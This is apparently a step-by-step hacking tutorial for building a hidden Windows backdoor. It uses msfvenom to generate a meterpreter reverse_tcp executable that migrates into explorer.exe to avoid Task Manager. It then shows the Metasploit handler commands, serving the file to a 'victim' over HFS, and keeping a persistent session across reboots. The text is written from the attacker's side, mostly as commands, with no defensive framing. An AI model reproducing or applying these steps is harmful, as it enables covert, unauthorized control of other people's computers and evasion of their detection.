It is very important to migrate your backdoor to any other background process of windows otherwise the victim can find it by going through task manager.
Migrating the backdoor also benefits the attacker in the way that when the victim executes the backdoor file, session gets started but when that file is closed, the session also get closed, so attacker have to be very quick to do this as soon as the session opens.
To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC.
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 : First get your ip address with ifconfig command
Step 2 :
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.132 lport=4466 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/HackFile.exe
PrepenMigrate is an awesome way of saving shells and moving shells into different processes.
Step 3 : Open MetaSploit with msfconsole command
Step 4 : the file will generated on your Desktop(HackFile.exe).
Now use exploit.
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.18.132
msf exploit(handler) > set lport 4466
msf exploit(handler) > options
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > run
Step 5 : Share a file with HFS (HTTP file Sever)
HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article
How to send or receive files in Kali Linux - Using HFS(HTTP File Server)
Step 6 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Step 7 : Download the file and run it.
Step 8 : When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!
Step 9 : Now its time to check if the backdoor will open for us a new session every time that the system will boot. So we will reboot the system.
Windows is shutting down
See all sessions automatically closed.
Step 10 : Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 5 seconds until it has successfully open a session for us.
Step 11 : Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again.